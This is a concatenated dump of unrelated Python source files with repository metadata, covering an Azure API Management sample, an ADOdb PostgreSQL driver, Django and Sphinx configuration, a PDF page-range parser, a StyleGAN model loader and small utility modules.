"Cvalladares4837@gmail.com"
] | Cvalladares4837@gmail.com |
a150f25eb027d1b21cf74cf109a18e85acada783 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/apimanagement/azure-mgmt-apimanagement/generated_samples/api_management_user_confirmation_password_send.py | 793650579dac2e949735e69fe128bc5958cef7ad | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,638 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.apimanagement import ApiManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-apimanagement
# USAGE
python api_management_user_confirmation_password_send.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Send the account-confirmation (password reset) e-mail to one user."""
    credential = DefaultAzureCredential()
    client = ApiManagementClient(credential=credential, subscription_id="subid")
    # Trigger the confirmation e-mail for the given user of the
    # API Management service instance.
    response = client.user_confirmation_password.send(
        resource_group_name="rg1", service_name="apimService1", user_id="57127d485157a511ace86ae7"
    )
    print(response)
# x-ms-original-file: specification/apimanagement/resource-manager/Microsoft.ApiManagement/stable/2022-08-01/examples/ApiManagementUserConfirmationPasswordSend.json
# Allow running this sample directly from the command line.
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | noreply@github.com |
101e6cd4892fefaf5467a3acd914319a647fb08d | 59db55b4a8aa9740dd488e09685c0b3aea1a280c | /adodb-220/build/lib.linux-x86_64-2.7/adodb/adodb_postgres.py | 4b1ee64b25d8c6e7b1ce560689e71c385a25f2aa | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Iskuri/Banner-Grabber | 08c7579186ea40dd898529b0c2c33a3316d65a1d | 9e21dab02c41797cdf50cc69e8a28b95a906b3de | refs/heads/master | 2021-01-22T19:32:20.138848 | 2013-09-29T07:53:34 | 2013-09-29T07:53:34 | 12,995,136 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,349 | py | ########################################################################
# Vers 2.10 16 July 2008, (c)2004-2008 John Lim (jlim#natsoft.com) All Rights Reserved
# Released under a BSD-style license. See LICENSE.txt.
# Download: http://adodb.sourceforge.net/#pydownload
########################################################################
import adodb
import psycopg
# Very old Pythons (< 2.2.1) lack the True/False builtins; probe for them
# and fall back to plain ints so this module stays importable there.
try:
    True, False
except NameError:
    # Maintain compatibility with Python 2.2
    True, False = 1, 0
# Thread Safety= 2 connections
# Param Style = pyformat "%(name)s"
class adodb_postgres(adodb.ADOConnection):
    """ADOdb connection driver for PostgreSQL on top of classic psycopg.
    Connections run in autocommit mode until BeginTrans() turns it off;
    Commit/Rollback restore autocommit, emulating explicit transactions.
    """
    databaseType = 'postgres'
    dataProvider = 'postgres'
    sysDate = "CURRENT_DATE"
    sysTimeStamp = "CURRENT_TIMESTAMP"
    # The two %s placeholders are both filled with the table name by
    # MetaColumns() below (exact-case or lower-case match).
    metaColSQL = """SELECT a.attname,t.typname,a.attlen,a.atttypmod,a.attnotnull,a.atthasdef,a.attnum
    FROM pg_class c, pg_attribute a,pg_type t
    WHERE relkind = 'r' AND (c.relname='%s' or c.relname = lower('%s')) and a.attname not like '....%%'
    AND a.attnum > 0 AND a.atttypid = t.oid AND a.attrelid = c.oid ORDER BY a.attnum"""
    def __init__(self):
        pass
    def Module(self):
        """Return the underlying DB-API module (psycopg)."""
        return psycopg
    #host=host1 user=user1 password=secret port=4341
    def _connect(self,host=None,user=None,password=None,database=None):
        """Open a connection, from a full DSN string (passed as ``host``)
        when only ``host`` is given, else from the individual parts.
        """
        if user == None and password == None and database == None:
            dsn = host
        else:
            dsn = 'host='+self.addq(host)
            if (user != None): dsn += ' user='+self.addq(user)
            if (password != None): dsn += ' password='+self.addq(password)
            if (database != None): dsn += ' dbname='+self.addq(database)
        self._conn = psycopg.connect(dsn)
        # Start in autocommit; see BeginTrans/CommitTrans below.
        self._conn.autocommit(1)
    def _newcursor(self,rs):
        return cursor_postgres(rs,self)
    def SelectLimit(self,sql,limit,offset=-1,params=None):
        """Execute ``sql`` with LIMIT/OFFSET appended (offset < 0 = none)."""
        if (offset >= 0): offset = " OFFSET "+str(offset)
        else: offset = ""
        return self.Execute(sql+" LIMIT "+str(limit)+offset,params)
    def BeginTrans(self):
        # Disabling autocommit makes psycopg open an implicit transaction.
        if self._autocommit:
            self._autocommit = False
            self._conn.autocommit(0)
    def RollbackTrans(self):
        self._conn.rollback()
        self._autocommit = True
        self._conn.autocommit(1)
    def CommitTrans(self):
        self._conn.commit()
        self._autocommit = True
        self._conn.autocommit(1)
    def _blobencode(self,blob):
        """Escape a byte string using PostgreSQL octal-escape syntax."""
        blob = str(blob)
        #92=backslash, 0=null, 39=single-quote
        return blob.replace(chr(92),r'\\134').replace(chr(0),r'\\000').replace(chr(39),r'\\047')
    def UpdateBlob(self,table,field,blob,where,blobtype='BLOB'):
        # NOTE(review): SQL is built by string interpolation — table, field
        # and where must come from trusted input; there is no param binding.
        if (blobtype == 'BLOB'):
            self.Execute("update %s set %s='%s' WHERE %s" % (table,field,self._blobencode(blob),where))
        else:
            self.Execute("update %s set %s='%s' WHERE %s" % (table,field,self.addq(blob),where))
    def MetaColumns(self, table):
        """Return name/type/size metadata rows for ``table``'s columns."""
        #print self.metaColSQL
        sql = self.metaColSQL % (table,table)
        return self.GetAll(sql)
class cursor_postgres(adodb.ADOCursor):
    """Thin cursor wrapper; all behaviour lives in adodb.ADOCursor."""
    def __init__(self,rs,conn):
        adodb.ADOCursor.__init__(self,rs,conn)
# Manual smoke test: connect to a local test database and run the shared
# adodb test helpers (requires a running PostgreSQL server).
if __name__ == '__main__':
    db = adodb_postgres()
    db.Connect('localhost','tester','test','test')
    adodb.Test(db)
    #adodb.Test_Blob(db)
"christopher@desktop.laptop"
] | christopher@desktop.laptop |
3d89915c498c68bd9d17c84c6b2ddf8a5a3a0dc1 | 4dcb84ae7e60a9f82e6f9bdf39cd6db6a76cacc5 | /myMatchingApp/manage.py | 4e36140caf08c21da65fc9b595e174ce7e76d443 | [] | no_license | lmarianarp19/myMatchingApp | b0f6ce94e88be072d1e656b6768ac36c0d7db77a | aa338d2276505f90c5b2b762d93932205090fed7 | refs/heads/master | 2021-05-15T05:58:29.474206 | 2018-01-24T21:36:08 | 2018-01-24T21:36:08 | 116,075,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Default to this project's settings unless the caller overrides them.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myMatchingApp.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint: the usual cause is a missing
        # install or an inactive virtualenv, not a broken Django.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch to Django's command-line interface (runserver, migrate, ...).
    execute_from_command_line(sys.argv)
| [
"lmarianarp@gmail.com"
] | lmarianarp@gmail.com |
6b44bf6e1fdf400b4c6bb129494dc274380387f5 | 8ec40c0c569550a14ae173c2c074f7dcc6bcd8d9 | /help/source/conf.py | 1265d760bd431fec72eb033b7603b296cf08212a | [] | no_license | klakar/layerList | 638f3fc2778ecd36ad64e6dfa17cf4c978706468 | fb242d375a04eb7ae8c8baefbfe5ec3b69f56311 | refs/heads/master | 2021-01-19T01:52:09.769511 | 2016-07-02T20:11:01 | 2016-07-02T20:11:01 | 19,351,050 | 0 | 0 | null | 2015-07-08T16:15:32 | 2014-05-01T16:53:34 | Python | UTF-8 | Python | false | false | 7,052 | py | # -*- coding: utf-8 -*-
#
# layerlist documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 12 17:11:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Sphinx extension modules; pngmath predates imgmath (Sphinx < 1.4 era).
extensions = ['sphinx.ext.todo', 'sphinx.ext.pngmath', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'layerlist'
copyright = u'2013, Klas Karlsson'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# Nothing excluded yet; add glob patterns (e.g. '_build') here if needed.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
# Pygments syntax-highlighting style used in code samples.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# Built-in HTML theme shipped with Sphinx.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# Static assets copied verbatim into the HTML build (may override defaults).
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
# Output basename for the HTML Help builder.
# NOTE(review): still says 'templateclassdoc' although the project is
# 'layerlist' — likely left over from the plugin template.
htmlhelp_basename = 'templateclassdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
# One LaTeX document: (start file, target name, title, author, doc class).
latex_documents = [
  ('index', 'layerlist.tex', u'layerlist Documentation',
   u'Klas Karlsson', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# One man page: (start file, name, description, authors, manual section).
man_pages = [
    ('index', 'templateclass', u'layerlist Documentation',
     [u'Klas Karlsson'], 1)
]
| [
"klaskarlsson@hotmail.com"
] | klaskarlsson@hotmail.com |
bb9907066005e577a1998be045ba95d25cf0401b | 48bb4a0dbb361a67b88b7c7532deee24d70aa56a | /codekata/greatese.py | 5bf5eea99317b8d7235f806cd8e0e600b1945704 | [] | no_license | PRAMILARASI/GUVI | 66080a80400888263d511138cb6ecd37540507c7 | 6a30a1d0a3f4a777db895f0b3adc8b0ac90fd25b | refs/heads/master | 2022-01-28T08:54:07.719735 | 2019-06-24T15:57:05 | 2019-06-24T15:57:05 | 191,355,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | x=int(input(""))
y=int(input(""))
z=int(input(""))
if(x>y>z):
largest=x
print(largest)
elif(y>z):
largest=y
print (largest)
else:
largest=z
print(largest)
| [
"noreply@github.com"
] | noreply@github.com |
f08781c8f26e8affed183ad0d876cd3d32f6e4cf | cabe1d490d39f899f08f247288d48c09a556205a | /cloudpulse/scenario/plugins/all_tests/all_tests.py | c9249978b4459333b9629bd3bc731327508d647b | [
"Apache-2.0"
] | permissive | tsjondin/cloudpulse | 69053e795e371ec87e7da2e3ded0c123334ad11e | 45b7cbe59c8a3c8a5f50eb051dd151f25fbee4e7 | refs/heads/master | 2021-06-26T02:20:06.090310 | 2017-06-22T04:57:56 | 2017-06-22T04:58:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,159 | py | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudpulse.common.plugin import discover
from cloudpulse.scenario import base
from oslo_config import cfg
# Pull in keystonemiddleware's auth_uri option so it can be read from this
# service's config under the [keystone_authtoken] group.
cfg.CONF.import_opt('auth_uri', 'keystonemiddleware.auth_token',
                    group='keystone_authtoken')
TESTS_OPTS = [
    cfg.IntOpt('all_tests',
               default=0,
               help='Run all tests')
]
CONF = cfg.CONF
# The options above are registered under [periodic_tests] in the config file.
periodic_test_group = cfg.OptGroup(name='periodic_tests',
                                   title='Periodic tests to be run')
CONF.register_group(periodic_test_group)
CONF.register_opts(TESTS_OPTS, periodic_test_group)
class all_scenario(base.Scenario):
    """Aggregate scenario: runs every "all*" case of each enabled plugin."""

    @base.scenario(admin_only=False, operator=False)
    def all_tests(self):
        """Execute every "all*"-prefixed case of the enabled scenarios.

        Returns (200, "All Tests passed") when everything succeeds,
        otherwise (404, <double-newline-joined failure messages>).
        """
        enabled = cfg.CONF.scenario.enabled_scenarios
        status = 200
        failures = ''
        # Import the plugin package so every Scenario subclass is loaded.
        discover.import_modules_from_package("cloudpulse.scenario.plugins")
        cases = []
        for group in discover.itersubclasses(base.Scenario):
            if group.__name__ not in enabled:
                continue
            for attr in dir(group):
                if attr.startswith("all"):
                    # Instantiate per case, matching the original behaviour.
                    cases.append(getattr(group(), attr))
        for case in cases:
            try:
                outcome = case()
            except Exception as e:
                # A crashing case is treated as an ordinary failure.
                outcome = [404, str(e)]
            if outcome[0] != 200:
                failures += ("%s\n\n" % (outcome[1]))
                status = 404
        if not failures:
            failures = "All Tests passed"
        return (status, failures)
| [
"anand1712@gmail.com"
] | anand1712@gmail.com |
1ebddb7866c7815a2e3c97c2bf8ff563a8a599a8 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/PyPDF2/pagerange.py | c19d1790b7d1f2f79c4ccb755a80439f4a49a821 | [] | no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,650 | py | #!/usr/bin/env python
"""
Representation and utils for ranges of PDF file pages.
Copyright (c) 2014, Steve Witham <switham_github@mac-guyver.com>.
All rights reserved. This software is available under a BSD license;
see https://github.com/mstamy2/PyPDF2/LICENSE
"""
import re
from .utils import Str
_INT_RE = r"(0|-?[1-9]\d*)"  # A decimal int, don't allow "-0".
PAGE_RANGE_RE = "^({int}|({int}?(:{int}?(:{int}?)?)))$".format(int=_INT_RE)
# groups:    12     34     5 6     7 8


class ParseError(Exception):
    """Raised when a page-range expression cannot be parsed."""


PAGE_RANGE_HELP = """Remember, page indices start with zero.
        Page range expression examples:
            :     all pages.                   -1    last page.
            22    just the 23rd page.          :-1   all but the last page.
            0:3   the first three pages.       -2    second-to-last page.
            :3    the first three pages.       -2:   last two pages.
            5:    from the sixth page onward.  -3:-1 third & second to last.
        The third, "stride" or "step" number is also recognized.
            ::2       0 2 4 ... to the end.    3:0:-1    3 2 1 but not 0.
            1:10:2    1 3 5 7 9                2::-1     2 1 0.
            ::-1      all pages in reverse order.
"""


class PageRange(object):
    """
    A slice-like representation of a range of page indices,
    i.e. page numbers, only starting at zero.
    The syntax is like what you would put between brackets [ ].
    The slice is one of the few Python types that can't be subclassed,
    but this class converts to and from slices, and allows similar use.
      o  PageRange(str) parses a string representing a page range.
      o  PageRange(slice) directly "imports" a slice.
      o  to_slice() gives the equivalent slice.
      o  str() and repr() allow printing.
      o  indices(n) is like slice.indices(n).
    """

    def __init__(self, arg):
        """
        Initialize with either a slice -- giving the equivalent page range,
        or a PageRange object -- making a copy,
        or a string like
            "int", "[int]:[int]" or "[int]:[int]:[int]",
        where the brackets indicate optional ints.
        {page_range_help}
        Note the difference between this notation and arguments to slice():
            slice(3) means the first three pages;
            PageRange("3") means the range of only the fourth page.
        However PageRange(slice(3)) means the first three pages.
        """
        if isinstance(arg, slice):
            self._slice = arg
            return
        if isinstance(arg, PageRange):
            self._slice = arg.to_slice()
            return
        m = isinstance(arg, Str) and re.match(PAGE_RANGE_RE, arg)
        if not m:
            raise ParseError(arg)
        elif m.group(2):
            # Special case: just an int means a range of one page.
            start = int(m.group(2))
            stop = start + 1 if start != -1 else None
            self._slice = slice(start, stop)
        else:
            self._slice = slice(*[int(g) if g else None
                                  for g in m.group(4, 6, 8)])
    # Substitute the shared help text into __init__'s docstring.
    __init__.__doc__ = __init__.__doc__.format(page_range_help=PAGE_RANGE_HELP)

    @staticmethod
    def valid(input):  # parameter name kept (``input``) for keyword-arg compat
        """ True if input is a valid initializer for a PageRange. """
        return isinstance(input, slice) or \
               isinstance(input, PageRange) or \
               (isinstance(input, Str)
                and bool(re.match(PAGE_RANGE_RE, input)))

    def to_slice(self):
        """ Return the slice equivalent of this page range. """
        return self._slice

    def __str__(self):
        """ A string like "1:2:3". """
        s = self._slice
        # Idiom fix: compare to None with ``is``/``is not``, not ``==``.
        if s.step is None:
            if s.start is not None and s.stop == s.start + 1:
                return str(s.start)
            indices = s.start, s.stop
        else:
            indices = s.start, s.stop, s.step
        return ':'.join("" if i is None else str(i) for i in indices)

    def __repr__(self):
        """ A string like "PageRange('1:2:3')". """
        return "PageRange(" + repr(str(self)) + ")"

    def indices(self, n):
        """
        n is the length of the list of pages to choose from.
        Returns arguments for range().  See help(slice.indices).
        """
        return self._slice.indices(n)
# Shared constant: the page range covering every page (equivalent to [:]).
PAGE_RANGE_ALL = PageRange(":")       # The range of all pages.
def parse_filename_page_ranges(args):
    """
    Given a list of filenames and page ranges, return a list of
    (filename, page_range) pairs.
    The first arg must be a filename; later args are filenames, page-range
    expressions, slice objects, or PageRange objects.
    A filename not followed by a page range means all pages of that file.
    """
    pairs = []
    current_file = None
    saw_range = False
    # The trailing None sentinel flushes the final filename at end of list.
    for token in args + [None]:
        if PageRange.valid(token):
            if not current_file:
                raise ValueError("The first argument must be a filename, " \
                    "not a page range.")
            pairs.append((current_file, PageRange(token)))
            saw_range = True
        else:
            # New filename (or the sentinel): if the previous file got no
            # explicit range, it means all of its pages.
            if current_file and not saw_range:
                pairs.append((current_file, PAGE_RANGE_ALL))
            current_file = token
            saw_range = False
    return pairs
| [
"noreply@github.com"
] | noreply@github.com |
1649d917f53e31b226522ddb6e6e0bd1dc1ceae1 | 8552e78086fc563d4fa8bc64ec1e81fafe243b74 | /modules/database/pullUser.py | d95acea0c80442a170d421d8a52b6fa0e0c05610 | [] | no_license | ms7m/guardia | 5ea9b416e0d3728ad25a41533e43396e28fbc8ec | 710fe69e60a079d0da3ee73014cb5ae1315d0732 | refs/heads/master | 2022-12-10T21:37:23.103738 | 2020-01-19T04:28:14 | 2020-01-19T04:28:14 | 229,809,903 | 3 | 0 | null | 2022-12-08T03:20:52 | 2019-12-23T19:17:41 | Python | UTF-8 | Python | false | false | 3,296 | py | from modules.database.createDatabase import MongoDB
from modules.authentication import SettingsConfiguration as Configuration
from datetime import datetime
from loguru import logger
from bson.objectid import ObjectId
class PullUser:
    """Read-through user lookup: try the Redis cache first, then MongoDB."""
    def _loadPrimaryDatabase(self):
        """Bind the primary 'userData' collection from the MongoDB wrapper.
        Returns True on success; logs diagnostics and raises otherwise.
        """
        try:
            self.primary_database = self._mongoDb.resulting['userData']
            return True
        except Exception as error:
            logger.debug(f'Dumped Attrs: {dir(self._mongoDb)}')
            try:
                logger.debug(f"Resulting: {self._mongoDb.resulting}")
            except Exception as dumped_error:
                logger.error('Complete Failure. Both Exceptions occured.')
                logger.error(f'Error on PrimaryGet: {error}')
                logger.error(f"Error on Dump: {dumped_error}")
                raise Exception('Unable to load primary Database.')
    def __init__(self, mongoDbObject, redisConnection):
        """Store both connections and eagerly bind the user collection.
        Raises ValueError for a non-MongoDB ``mongoDbObject`` and a plain
        Exception when the primary database cannot be loaded.
        """
        self.redisConnection = redisConnection
        # Idiom fix: ``isinstance(...) == True`` -> plain truth test.
        if isinstance(mongoDbObject, MongoDB):
            self._mongoDb = mongoDbObject
            attempt_loadPrimaries = self._loadPrimaryDatabase()
            if attempt_loadPrimaries == True:
                self._primaryVerifiation = True
            else:
                raise Exception('Unable to load primary database.')
        else:
            raise ValueError(f'Improper Object. Expected MongoDB. {mongoDbObject}')
        logger.info('Initalized Pull User.')
    def _redisPullUser(self, redis_cache_id):
        """Return (hit, record) from the Redis cache; (False, None) on a
        miss or on any cache error (the caller falls back to MongoDB).
        """
        try:
            redis_query, redis_result = self.redisConnection._checkKey(
                redis_cache_id
            )
            if redis_query == True:
                return True, redis_result
            return False, None
        except Exception as error:
            logger.info(f"unable to get redis result due to {error}")
            return False, None
    def _mongoPullUser(self, object_id):
        """Fallback lookup by ObjectId directly against MongoDB."""
        mongo_result = self._mongoDb.find_one(
            {
                "_id": ObjectId(object_id)
            }
        )
        if mongo_result:
            return True, mongo_result
        else:
            logger.critical("Unable to find mongo result even with provided ID!")
            # Bug fix: this line lacked the f-prefix and logged the literal
            # text "{object_id}" instead of the actual id.
            logger.debug(f"Error ID: {object_id}")
            return False, None
    def pull_user_from_service(self, verifyObject, providedServiceId):
        """Verify a user through ``verifyObject`` by service-unique id."""
        # Psuedo Link to verifyUser.verify_user with Configuration
        provided_configuration = Configuration()
        # Configure
        provided_configuration.provided_id_bool = False
        provided_configuration.serviceUniqueId = providedServiceId
        return verifyObject.verify_user(provided_configuration)
    def pull_user(self, redis_cache_id):
        """Return the user record for ``redis_cache_id`` (cache first), or
        None when neither Redis nor MongoDB knows the id.
        """
        redis_query, redis_result = self._redisPullUser(
            redis_cache_id
        )
        if redis_query == True:
            return redis_result
        else:
            mongo_query, mongo_result = self._mongoPullUser(
                redis_cache_id
            )
            if mongo_query == True:
                return mongo_result
            else:
                logger.critical(f"Completely Unable to Find Specified ID! {redis_cache_id}")
                return None
| [
"ms7mohamed@gmail.com"
] | ms7mohamed@gmail.com |
b120bf63954049ee7c975ea42b994bd4403d4544 | 3fb57bf3bd86cc75985faaa2c83318273e723d81 | /project/model.py | 7f5debdd8636663ed8ac446cc1397a5836b77e41 | [
"MIT"
] | permissive | delldu/Idinvert | ea0fd376a0b92636232bd0ba5cafdd8d129367dc | 9977118e37ac18d573497eb7cdb7be66fbc50a58 | refs/heads/master | 2023-07-02T12:54:40.178912 | 2021-08-11T12:55:53 | 2021-08-11T12:55:53 | 393,851,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | """Create model.""" # coding=utf-8
#
# /************************************************************************************
# ***
# *** Copyright Dell 2021, All Rights Reserved.
# ***
# *** File Author: Dell, 2021年 08月 10日 星期二 15:49:52 CST
# ***
# ************************************************************************************/
#
import os
import pdb # For debug
import torch
from stylegan2_encoder import StyleGANEncoder
from stylegan2_decoder import StyleGANDecoder
from stylegan2_refiner import VGG16, StyleGANRefiner
def model_load(model, path, prefix=""):
"""Load model."""
if not os.path.exists(path):
print("Model '{}' does not exist.".format(path))
return
state_dict = torch.load(path, map_location=lambda storage, loc: storage)
target_state_dict = model.state_dict()
for n, p in state_dict.items():
if len(prefix) > 0 and not n.startswith(prefix):
continue
n = n.replace(prefix, "")
if n in target_state_dict.keys():
target_state_dict[n].copy_(p)
else:
raise KeyError(n)
def model_save(model, path):
"""Save model."""
torch.save(model.state_dict(), path)
def get_encoder(checkpoint):
"""Create model."""
model = StyleGANEncoder()
model_load(model, checkpoint, prefix="")
return model
def get_decoder(checkpoint):
"""Create model."""
model = StyleGANDecoder()
model_load(model, checkpoint, prefix="synthesis.")
return model
def get_vgg16(checkpoint):
"""Create model."""
model = VGG16()
model_load(model, checkpoint, prefix="")
return model
def get_refiner():
model = StyleGANRefiner()
model_load(model.encoder, "models/stylegan2_encoder.pth", prefix="")
model_load(model.decoder, "models/stylegan2_decoder.pth", prefix="synthesis.")
model_load(model.vgg16, "models/stylegan2_vgg16.pth", prefix="")
return model
def model_device():
"""Please call after model_setenv."""
return torch.device(os.environ["DEVICE"])
def model_setenv():
"""Setup environ ..."""
# random init ...
import random
random.seed(42)
torch.manual_seed(42)
# Set default device to avoid exceptions
if os.environ.get("DEVICE") != "cuda" and os.environ.get("DEVICE") != "cpu":
os.environ["DEVICE"] = "cuda" if torch.cuda.is_available() else "cpu"
if os.environ["DEVICE"] == "cuda":
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
print("Running Environment:")
print("----------------------------------------------")
print(" PWD: ", os.environ["PWD"])
print(" DEVICE: ", os.environ["DEVICE"])
| [
"18588220928@163.com"
] | 18588220928@163.com |
f8dfb8754afe031d0868f8fefdf0e6c12c094aa0 | bea2cd0fdfe792fdc07acece472a14ff650d5663 | /adsys/adverthistory/models.py | 6296ce94b5e1d4c8d767b9f0c9917ef4ef62d92a | [] | no_license | kostadinoval/django-adsys | 5fcf1a1263c1a59a73460a2d614125159b079faa | ecef78830b7f8d68a68148e7108ec40cc1414453 | refs/heads/master | 2021-01-10T07:56:53.913781 | 2015-11-28T18:26:00 | 2015-11-28T18:26:00 | 46,121,070 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | from django.db import models
from advert.models import Advert
class AdvertImpression(models.Model):
    # Running impression counter, one row per advert.
    advert = models.ForeignKey(Advert)
    numberOfImpressions = models.IntegerField(default = 0)
    def __unicode__(self):
        # Python 2 display name (used e.g. by the Django admin).
        return "Advert: " + str(self.advert) + " - " + "Number of impressions: " + str(self.numberOfImpressions)
class AdvertClick(models.Model):
    # Running click counter, one row per advert.
    advert = models.ForeignKey(Advert)
    numberOfClicks = models.IntegerField(default = 0)
    def __unicode__(self):
        # Python 2 display name (used e.g. by the Django admin).
        return "Advert: " + str(self.advert) + " - " + "Number of clicks: " + str(self.numberOfClicks)
| [
"aleksandar.kostadinov@hotmail.co.uk"
] | aleksandar.kostadinov@hotmail.co.uk |
